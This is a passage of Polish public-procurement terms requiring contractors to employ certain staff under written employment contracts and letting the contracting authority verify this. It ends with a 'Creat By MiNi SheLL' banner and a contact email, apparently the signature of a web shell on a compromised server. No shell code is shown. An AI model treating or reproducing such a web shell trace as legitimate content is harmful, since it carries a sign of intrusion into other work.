dnia 26 czerwca 1974 r. – Kodeks pracy (Dz.U.2020.1320 t.j. ze zm.).<br/>2.	Zarówno Wykonawca jak i Podwykonawca(y) (jeżeli uczestniczy(ą) w wykonaniu zamówienia) winni dokumentować zatrudnienie osób określonych w pkt. 1 na piśmie, np. w formie listy umożliwiającej jednoznaczną identyfikację każdej z zatrudnionych osób i, na tej podstawie, weryfikację przez Zamawiającego zawartych umów o pracę, które, zgodnie z art. 29 §2 kodeksu pracy, muszą być zawarte na piśmie.<br/>3.	Zamawiający jest uprawniony do kontroli realizacji przez Wykonawcę / Podwykonawcę warunku wskazanego w pkt. 1 w całym okresie realizacji zamówienia. W tym celu może podejmować czynności szczegółowo określone w projekcie umowy stanowiącym załącznik nr 4 do SWZ, który zawiera również sankcje z tytułu niespełnienia tych wymagań.

Creat By MiNi SheLL
Email: jattceo@gmail.com